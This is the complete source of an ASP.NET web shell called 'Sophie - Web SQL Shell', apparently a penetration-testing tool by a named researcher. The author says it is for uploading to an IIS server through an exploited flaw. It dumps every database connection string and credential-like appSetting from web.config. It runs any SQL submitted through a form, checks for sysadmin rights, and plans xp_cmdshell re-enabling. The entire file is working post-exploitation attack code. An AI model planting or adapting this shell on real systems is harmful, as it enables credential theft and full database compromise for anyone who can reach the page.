<% ' If you can exploit a flaw to upload files to an executable directory in an IIS environment, ' this script parses web.config for connection strings and allows you to execute SQL queries ' Author: Jerome Smith @exploresecurity ' Version: 0.2 ' http://www.7safe.com ' http://www.exploresecurity.com ' Licence: free to modify and then distribute if you retain original credits, otherwise grateful if you refer to original download link, thank you ' To do: auto xp_cmdshell detection and re-enabling if possible ' information_schema viewer / simplified query tool to save all that typing ' add traditional web shell %> <% @ Page Language="VB" %> <% Response.Buffer=True %> Sophie - Web SQL Shell

Connection Strings

<connectionStrings>

<% Dim css = ConfigurationManager.ConnectionStrings ''' Collect all the connection strings in an array Dim connStrings(css.Count) As String For i As Integer = 0 To css.Count - 1 Response.Write("") Next i %>
Select Name Connection String
") Response.Write("") Response.Write(css.Item(i).Name) Response.Write("") Response.Write(css.Item(i).ConnectionString) connStrings(i) = css.Item(i).ConnectionString Response.Write("

<appSettings>
By default this script tries to identify connection strings from <appSettings> by looking for certain keywords in the key name and value.
<% if Request.Form("submit") = Nothing or Request.Form("submit") = "Revert" or ((Request.Form("submit") = "Get Info" or Request.Form("submit") = "Execute") and Request.Form("getAll") = Nothing) then Response.Write("To see all keys, click the Get All button.




") else Response.Write("To go back to the default list, click the Revert button.



") end if %> <% Dim index = connStrings.Length - 1 Dim key, value Dim getAll = False For Each key in ConfigurationManager.AppSettings value = ConfigurationManager.AppSettings(key) if Request.Form("submit") = "Get All" or ((Request.Form("submit") = "Get Info" or Request.Form("submit") = "Execute") and Request.Form("getAll") <> Nothing) then Response.Write("") getAll = True end if ''' Look for evidence of a connection string by keywords (it is big but it's not clever) if getAll or key.IndexOf("con", StringComparison.OrdinalIgnoreCase)>-1 or value.IndexOf("DSN", StringComparison.OrdinalIgnoreCase)>-1 or value.IndexOf("data", StringComparison.OrdinalIgnoreCase)>-1 or value.IndexOf("source", StringComparison.OrdinalIgnoreCase)>-1 or value.IndexOf("database", StringComparison.OrdinalIgnoreCase)>-1 or value.IndexOf("server", StringComparison.OrdinalIgnoreCase)>-1 or value.IndexOf("uid", StringComparison.OrdinalIgnoreCase)>-1 or value.IndexOf("user", StringComparison.OrdinalIgnoreCase)>-1 then Response.Write("") connStrings(index) = ConfigurationManager.AppSettings(key) ''' Expand the array by 1 and keep current values ReDim Preserve connStrings(connStrings.Length) index = index + 1 end if Next %>
Select Name Connection String
") Response.Write("") Response.Write(key) Response.Write("") Response.Write(ConfigurationManager.AppSettings(key)) Response.Write("


SQL


<% Response.Write("

Output

") if Request.Form("cs") = "" then Response.Write("No connection string set") else if Request.Form("submit") = "Execute" or Request.Form("submit") = "Get Info" then Dim connStr = connStrings(Request.Form("cs")) Dim odbc = False Dim conn, reader Try if connStr.IndexOf("DSN", StringComparison.OrdinalIgnoreCase)>-1 then conn = New System.Data.Odbc.OdbcConnection(connStr) odbc = True else conn = New System.Data.SqlClient.SqlConnection(connStr) end if conn.Open() Dim cmd, infoQueries Dim getInfo = False if Request.Form("submit") = "Get Info" then infoQueries = New String(,) { {"SELECT @@version","server"}, {"SELECT db_name()","database"}, {"SELECT user","user"}, {"SELECT system_user","system_user"}, {"SELECT is_srvrolemember('sysadmin')","sysadmin?"}, {"SELECT is_srvrolemember('serveradmin')","serveradmin?"} } getInfo = True else infoQueries = New String(,) { {Request.Form("sql"),""} } end if Response.Write("") For index = 0 to infoQueries.GetUpperBound(0) if odbc then cmd = New System.Data.Odbc.OdbcCommand(infoQueries(index,0), conn) else cmd = New System.Data.SqlClient.SqlCommand(infoQueries(index,0), conn) end if reader = cmd.ExecuteReader() if Not reader.hasRows then Response.Write("
No rows returned") end if Dim colNames As Boolean = True ''' Read a row at a time While reader.Read() Response.Write("") Dim i as Integer ''' If Get Info requested, output a friendly name to describe each query if getInfo then Response.Write("" & infoQueries(index,1) & "") colNames = False end if ''' The first row of output should be the column names if colNames then For i = 0 To reader.FieldCount - 1 Response.Write("") Response.Write(reader.GetName(i)) Response.Write("") Next Response.Write("") end if For i = 0 To reader.FieldCount - 1 Response.Write("") Response.Write(reader.GetValue(i)) Response.Write("") Next Response.Write("") colNames = False End While reader.Close() Next Catch ex As Exception Response.write("Something went wrong...
" & ex.Message & "
") Finally if reader isNot Nothing then reader.Close() end if if conn isNot Nothing then conn.Close() end if Response.Write("") Response.Write("") End Try end if %>